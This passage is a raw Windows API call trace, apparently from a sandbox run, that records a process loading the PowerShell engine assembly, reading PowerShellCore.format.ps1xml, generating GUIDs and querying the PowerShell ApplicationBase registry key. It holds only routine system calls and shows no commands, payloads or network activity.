lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.345] GetLastError () returned 0x0 [0141.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.345] GetLastError () returned 0x0 [0141.346] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xd7540243, Data2=0x1473, Data3=0x4a57, Data4=([0]=0x94, [1]=0x48, [2]=0xe0, [3]=0xfd, [4]=0x1a, [5]=0xa8, [6]=0xdd, [7]=0xaf))) returned 0x0 [0141.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.346] GetLastError () returned 0x0 [0141.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.346] GetLastError () returned 0x0 [0141.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.346] GetLastError () returned 0x0 [0141.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.346] GetLastError () returned 0x0 [0141.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.346] GetLastError () returned 0x0 [0141.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.346] GetLastError () returned 0x0 [0141.346] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x8a40cc2e, Data2=0xfaaa, Data3=0x40ad, Data4=([0]=0xb6, [1]=0x6a, [2]=0x7b, [3]=0xb0, [4]=0xea, [5]=0xc2, [6]=0x6, [7]=0xb7))) returned 0x0 [0141.346] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xda94ef2b, Data2=0x24c, Data3=0x4699, Data4=([0]=0x84, [1]=0xda, [2]=0x7c, [3]=0xc4, [4]=0xfd, [5]=0x42, [6]=0xfc, [7]=0x47))) returned 0x0 [0141.347] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x6c229ff, Data2=0xc30c, Data3=0x4f70, Data4=([0]=0x8a, [1]=0x9c, [2]=0x33, [3]=0xfc, [4]=0x8, [5]=0x92, [6]=0xb4, [7]=0x9c))) returned 0x0 [0141.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.347] GetLastError () returned 0x0 [0141.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.347] GetLastError () returned 0x0 [0141.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.347] GetLastError () returned 0x0 [0141.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.347] GetLastError () returned 0x0 [0141.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.347] GetLastError () returned 0x0 [0141.347] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.347] GetLastError () returned 0x0 [0141.347] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x103f3ddf, Data2=0x2f0, Data3=0x4f76, Data4=([0]=0xaa, [1]=0x0, [2]=0xbe, [3]=0x9d, [4]=0x60, [5]=0xa8, [6]=0xc4, [7]=0xee))) returned 0x0 [0141.348] VirtualQuery (in: lpAddress=0x25cc04, lpBuffer=0x25dc04, dwLength=0x1c | out: lpBuffer=0x25dc04*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.348] GetLastError () returned 0x0 [0141.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.348] GetLastError () returned 0x0 [0141.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.348] GetLastError () returned 0x0 [0141.348] VirtualQuery (in: lpAddress=0x25cc04, lpBuffer=0x25dc04, dwLength=0x1c | out: lpBuffer=0x25dc04*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.348] VirtualQuery (in: lpAddress=0x25cc40, lpBuffer=0x25dc40, dwLength=0x1c | out: lpBuffer=0x25dc40*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.348] GetLastError () returned 0x0 [0141.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.348] GetLastError () returned 0x0 [0141.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.348] GetLastError () returned 0x0 [0141.348] VirtualQuery (in: lpAddress=0x25cc04, lpBuffer=0x25dc04, dwLength=0x1c | out: lpBuffer=0x25dc04*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.349] VirtualQuery (in: lpAddress=0x25cc40, lpBuffer=0x25dc40, dwLength=0x1c | out: lpBuffer=0x25dc40*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.349] GetLastError () returned 0x0 [0141.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.349] GetLastError () returned 0x0 [0141.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.349] GetLastError () returned 0x0 [0141.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.349] GetLastError () returned 0x0 [0141.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.349] GetLastError () returned 0x0 [0141.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0141.349] GetLastError () returned 0x0 [0141.349] VirtualQuery (in: lpAddress=0x25cc04, lpBuffer=0x25dc04, dwLength=0x1c | out: lpBuffer=0x25dc04*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.349] VirtualQuery (in: lpAddress=0x25cc40, lpBuffer=0x25dc40, dwLength=0x1c | out: lpBuffer=0x25dc40*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.352] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x90754ef, Data2=0xfb87, Data3=0x431e, Data4=([0]=0x98, [1]=0x23, [2]=0x14, [3]=0xc9, [4]=0xbc, [5]=0x19, [6]=0xb2, [7]=0x87))) returned 0x0 [0141.355] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xe3e03255, Data2=0xc1ab, Data3=0x48c7, Data4=([0]=0x89, [1]=0x8b, [2]=0xc5, [3]=0xc1, [4]=0x7a, [5]=0xb4, [6]=0x64, [7]=0x83))) returned 0x0 [0141.357] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xaf1df3b1, Data2=0x31ba, Data3=0x4c41, Data4=([0]=0x8a, [1]=0xaf, [2]=0x6a, [3]=0x81, [4]=0x1a, [5]=0xe1, [6]=0xa5, [7]=0xa))) returned 0x0 [0141.357] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xcf40481e, Data2=0x31ae, Data3=0x4c43, Data4=([0]=0xb9, [1]=0x1f, [2]=0xf3, [3]=0xb5, [4]=0x76, [5]=0xce, [6]=0xe8, [7]=0xed))) returned 0x0 [0141.357] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x7029f0bf, Data2=0x4495, Data3=0x43a0, Data4=([0]=0xba, [1]=0x37, [2]=0x61, [3]=0x1c, [4]=0x11, [5]=0xa2, [6]=0x4d, [7]=0x21))) returned 0x0 [0141.357] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x797eecd3, Data2=0x89e8, Data3=0x44aa, Data4=([0]=0x8d, [1]=0x8e, [2]=0x13, [3]=0xd2, [4]=0xfc, [5]=0xbd, [6]=0x1e, [7]=0x3c))) returned 0x0 [0141.358] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x8d312df4, Data2=0x322, Data3=0x4da4, Data4=([0]=0x93, [1]=0x41, [2]=0x7c, [3]=0x2b, [4]=0xb6, [5]=0x75, [6]=0xd4, [7]=0xb4))) returned 0x0 [0141.358] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x32c5a7d8, Data2=0xaa85, Data3=0x4721, Data4=([0]=0x81, [1]=0x7d, [2]=0xde, [3]=0xfa, [4]=0x8a, [5]=0x59, [6]=0xc6, [7]=0x96))) returned 0x0 [0141.358] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xfbd72962, Data2=0x6f88, Data3=0x4b99, Data4=([0]=0x9b, [1]=0x7e, [2]=0x8b, [3]=0x6c, [4]=0xe9, [5]=0xfc, [6]=0x2a, [7]=0xe7))) returned 0x0 [0141.358] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x906a012d, Data2=0x7a3b, Data3=0x4796, Data4=([0]=0x9f, [1]=0xfb, [2]=0xb, [3]=0x27, [4]=0xbd, [5]=0xa8, [6]=0xbd, [7]=0x8e))) returned 0x0 [0141.359] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0141.359] GetLastError () returned 0x0 [0141.359] GetFileType (hFile=0x328) returned 0x1 [0141.359] SetErrorMode (uMode=0x1) returned 0x1 [0141.359] GetFileType (hFile=0x328) returned 0x1 [0141.360] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.361] GetLastError () returned 0x0 [0141.362] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.362] GetLastError () returned 0x0 [0141.362] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.362] GetLastError () returned 0x0 [0141.363] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.363] GetLastError () returned 0x0 [0141.363] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.363] GetLastError () returned 0x0 [0141.363] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.363] GetLastError () returned 0x0 [0141.363] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.363] GetLastError () returned 0x0 [0141.363] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.364] GetLastError () returned 0x0 [0141.364] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.364] GetLastError () returned 0x0 [0141.365] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.365] GetLastError () returned 0x0 [0141.365] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.365] GetLastError () returned 0x0 [0141.365] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.365] GetLastError () returned 0x0 [0141.365] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.365] GetLastError () returned 0x0 [0141.365] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.365] GetLastError () returned 0x0 [0141.366] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.366] GetLastError () returned 0x0 [0141.366] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.366] GetLastError () returned 0x0 [0141.366] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.366] GetLastError () returned 0x0 [0141.368] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.368] GetLastError () returned 0x0 [0141.368] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.368] GetLastError () returned 0x0 [0141.368] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.368] GetLastError () returned 0x0 [0141.368] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x1000, lpOverlapped=0x0) returned 1 [0141.368] GetLastError () returned 0x0 [0141.368] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0xe67, lpOverlapped=0x0) returned 1 [0141.369] GetLastError () returned 0x0 [0141.369] ReadFile (in: hFile=0x328, lpBuffer=0x32dcc77, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dcc77*, lpNumberOfBytesRead=0x25e364*=0x0, lpOverlapped=0x0) returned 1 [0141.369] GetLastError () returned 0x0 [0141.369] ReadFile (in: hFile=0x328, lpBuffer=0x32dd670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e364, lpOverlapped=0x0 | out: lpBuffer=0x32dd670*, lpNumberOfBytesRead=0x25e364*=0x0, lpOverlapped=0x0) returned 1 [0141.369] GetLastError () returned 0x0 [0141.370] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e2e8 | out: phkResult=0x25e2e8*=0x328) returned 0x0 [0141.370] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x0, lpcbData=0x25e32c*=0x0 | out: lpType=0x25e330*=0x1, lpData=0x0, lpcbData=0x25e32c*=0x56) returned 0x0 [0141.370] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e330, lpData=0x2e48d0, lpcbData=0x25e32c*=0x56 | out: lpType=0x25e330*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e32c*=0x56) returned 0x0 [0141.370] RegCloseKey (hKey=0x328) returned 0x0 [0141.372] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0xfb29b2c0, Data2=0x8898, Data3=0x404a, Data4=([0]=0x96, [1]=0x54, [2]=0xa0, [3]=0xd5, [4]=0xd2, [5]=0x8c, [6]=0xc1, [7]=0xfa))) returned 0x0 [0141.373] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x16001bbc, Data2=0x614d, Data3=0x45db, Data4=([0]=0xa3, [1]=0x75, [2]=0xf6, [3]=0xa4, [4]=0xa3, [5]=0x57, [6]=0xa, [7]=0xcf))) returned 0x0 [0141.373] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x7f1056b3, Data2=0x1cf4, Data3=0x4325, Data4=([0]=0x88, [1]=0x9f, [2]=0xd6, [3]=0x29, [4]=0xcc, [5]=0xab, [6]=0x34, [7]=0xa0))) returned 0x0 [0141.373] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x12ae7fdf, Data2=0xc8e4, Data3=0x4516, Data4=([0]=0x8a, [1]=0xe0, [2]=0x44, [3]=0xaf, [4]=0xc3, [5]=0x2, [6]=0x79, [7]=0x19))) returned 0x0 [0141.373] CoCreateGuid (in: pguid=0x25e358 | out: pguid=0x25e358*(Data1=0x9d28c019, Data2=0x5530, Data3=0x4616, Data4=([0]=0xb4, [1]=0x87, [2]=0xd1, 